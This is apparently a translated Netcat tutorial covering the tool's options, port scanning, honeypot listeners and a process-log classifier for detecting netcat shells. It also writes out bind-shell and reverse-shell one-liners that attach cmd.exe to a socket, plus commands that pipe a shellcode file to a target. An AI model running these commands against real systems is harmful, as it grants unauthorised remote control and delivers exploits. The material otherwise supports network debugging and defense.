How to use Netcat

Source: Internet
Author: User

Netcat is known as the 'Swiss Army knife' of the cyber security community, and there is probably no one who does not know it ...
It is a simple and useful tool that reads and writes data across network connections using the TCP or UDP protocol. It was designed as a stable backdoor tool
that can easily be driven directly by other programs and scripts. At the same time, it is a powerful network debugging and probing tool that can create almost any
kind of network connection you need, and it has several interesting built-in features (see below for details).
In China, there are two Windows versions: one is the original version written by Chris Wysopal, and the other is the new 'condensed' version
recompiled by 'Red and black'. The main program of the 'condensed' version is only a little over 10 KB (the 10 KB nc cannot perform the 4th and 5th uses described below;
the original nc that has this capability seems to be 60 KB :P). Although it is small, it does a lot of work.
=====================================================================================================
Software Introduction:

Tool Name: Netcat
Author: Hobbit && Chris Wysopal
Website: http://www.atstake.com/research/tools/network_utilities/
Category: Open source
Platform: linux/bsd/unix/windows
Version number under Windows: [v1.10 NT]

=====================================================================================================
Parameter description:

'nc.exe -h' shows how each parameter is used.
Basic format: nc [-options] hostname port[s] [ports] ...
              nc -l -p port [options] [hostname] [port]

-d           Background mode
-e prog      Program redirection: execute prog once connected [Dangerous!!]
-g gateway   Source-routing hop point[s], up to 8
-G num       Source-routing pointer: 4, 8, 12, ...
-h           Help information
-i secs      Delay interval
-l           Listen mode, for inbound connections
-L           Continue to listen after the connection is closed
-n           Numeric IP addresses only; hostnames cannot be used
-o file      Record the traffic as a hexadecimal dump
-p port      Local port number
-r           Randomize local and remote ports
-s addr      Local source address
-t           Use telnet interactive mode
-u           UDP mode
-v           Verbose output; use -v twice for more detail
-w secs      Timeout
-z           Turn input and output off; used for scanning

A port can also be written as a range in the form m-n.


=====================================================================================================
Basic usage:

The main uses are as follows:

1) Connect to a remote host, example:
Format: nc -nvv 192.168.x.x 80
Explanation: Connect to TCP port 80 of 192.168.x.x


2) Listen on the local host, example:
Format: nc -l -p 80
Explanation: Listen on TCP port 80 of this machine


3) Scan a remote host, example:
Format: nc -nvv -w2 -z 192.168.x.x 80-445
Explanation: Scan all ports of 192.168.x.x from TCP 80 to TCP 445


4) Bind a shell on the remote host, example:
Format: nc -l -p 5354 -t -e C:\winnt\system32\cmd.exe
Explanation: The cmd shell of the remote host is bound to TCP port 5354 of the remote host


5) Bind a shell on the remote host and connect back, example:
Format: nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: Bind the remote host's cmd shell and connect back to TCP port 5354 of 192.168.x.x


These are only the most basic uses (in fact, nc has many more uses;
combined with the pipe command "|" and the redirection commands "<", ">" and so on, it becomes even more powerful ...).
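
Seen from the monitoring side, the option letters in the table above are enough to tell the five basic uses apart in process-creation logs. The following Python sketch is an added example, not part of the original article; the function names, labels and sample command lines are constructed for illustration, and it assumes the binary keeps one of the usual nc/netcat file names.

```python
import shlex

NC_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}
TAKES_ARG = set("egGiopsw")  # options from the table that consume a value

def parse_flags(cmdline):
    """Return the option letters used, or None if argv[0] is not netcat."""
    argv = shlex.split(cmdline, posix=False)  # posix=False keeps backslashes
    exe = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower() if argv else ""
    if exe not in NC_NAMES:
        return None
    flags, i = set(), 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            for pos, ch in enumerate(tok[1:], 1):
                flags.add(ch)
                if ch in TAKES_ARG:
                    if pos == len(tok) - 1:  # value is the next token: skip it
                        i += 1
                    break  # otherwise the rest of this token is the value
        i += 1
    return flags

def classify(cmdline):
    flags = parse_flags(cmdline)
    if flags is None:
        return "not-netcat"
    if "e" in flags:  # a program is attached to the socket (uses 4 and 5)
        return "bind-shell" if flags & {"l", "L"} else "reverse-shell"
    if "z" in flags:
        return "port-scan"
    if flags & {"l", "L"}:
        return "listener"
    return "client"

# Constructed process-creation command lines (not real log data).
SAMPLES = [
    r"nc.exe -l -p 5354 -t -e C:\winnt\system32\cmd.exe",
    r"C:\temp\nc.exe -t -e c:\winnt\system32\cmd.exe 192.0.2.10 5354",
    "nc -nvv -w2 -z 192.0.2.10 80-445",
    "nc -L -p 80",
    "nc -nvv 192.0.2.10 80",
    "notepad.exe -e notes.txt",
]

def alerts(lines):
    """Return (label, command line) for every line that uses -e."""
    return [(classify(l), l) for l in lines if classify(l).endswith("shell")]
```

A renamed binary evades the file-name check, so treat the result as one signal alongside network telemetry.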

=====================================================================================================
Advanced usage:

6) Use in attacks, example:
Format 1: type.exe c:\exploit.txt | nc -nvv 192.168.x.x 80
Format 2: nc -nvv 192.168.x.x 80 < c:\exploit.txt
Explanation: Connect to port 80 of 192.168.x.x and send the contents of 'c:\exploit.txt' through the pipe (the two formats have the same effect;
they are the same idea :P)

Note: 'c:\exploit.txt' contains shellcode, etc.


7) Use as a honeypot [1], example:
Format: nc -L -p 80
Explanation: Use '-L' (note that the L is uppercase) to keep listening on a port until Ctrl+C is pressed


8) Use as a honeypot [2], example:
Format: nc -L -p 80 > c:\log.txt
Explanation: '-L' keeps listening on a port until Ctrl+C is pressed, and the output is written to 'c:\log.txt'; if the '>'
is changed to '>>', the log is appended to instead

Note: 'c:\log.txt' holds the log, etc.


9) Use as a honeypot [3], example:
Format 1: nc -L -p 80 < c:\honeypot.txt
Format 2: type.exe c:\honeypot.txt | nc -L -p 80
Explanation: '-L' keeps listening on a port until Ctrl+C is pressed, and the contents of 'c:\honeypot.txt' are 'sent' into its pipe!
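
What uses 7) to 9) add up to, written as an added Python example (not part of the original article): a listener that keeps accepting connections, sends a fixed banner and appends what each peer sends to a log, together with the timestamp and source address that the redirect in use 8) does not capture. The function names, the JSON-lines log format and the loopback demo are assumptions of this example.

```python
import json, socket, threading, time

def listen(host="127.0.0.1", port=0):
    """Bound, listening TCP socket; port 0 lets the OS pick a free port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, port))
    sock.listen(5)
    return sock

def serve(sock, banner, log_path, max_conns=None, max_bytes=4096, timeout=5.0):
    """Send banner to each peer and log what it sends, one JSON line each."""
    handled = 0
    while max_conns is None or handled < max_conns:  # re-listen, like -L
        conn, (ip, port) = sock.accept()
        data = b""
        with conn:
            conn.settimeout(timeout)  # like -w: do not hang on a silent peer
            try:
                conn.sendall(banner)  # like '< c:\honeypot.txt'
                while len(data) < max_bytes:
                    chunk = conn.recv(max_bytes - len(data))
                    if not chunk:
                        break
                    data += chunk
            except OSError:  # timeout or reset: keep what arrived
                pass
        record = {"ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
                  "src": ip, "sport": port, "data": data.decode("latin-1")}
        with open(log_path, "a", encoding="utf-8") as fh:  # append, like '>>'
            fh.write(json.dumps(record) + "\n")  # JSON escapes peer newlines
        handled += 1
    return handled

def demo(log_path):
    """Loopback self-check with one constructed probe; returns (reply, record)."""
    sock = listen()
    worker = threading.Thread(target=serve,
                              args=(sock, b"HTTP/1.0 200 OK\r\n\r\n", log_path, 1))
    worker.start()
    with socket.create_connection(sock.getsockname()) as client:
        client.sendall(b"GET / HTTP/1.0\r\n\r\n")
        client.shutdown(socket.SHUT_WR)
        reply = client.recv(1024)
    worker.join()
    sock.close()
    with open(log_path, encoding="utf-8") as fh:
        return reply, json.loads(fh.readlines()[-1])
```

Because each record is JSON-encoded, a peer cannot forge extra log lines by sending newlines, and the byte cap and timeout bound what a single connection can consume.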
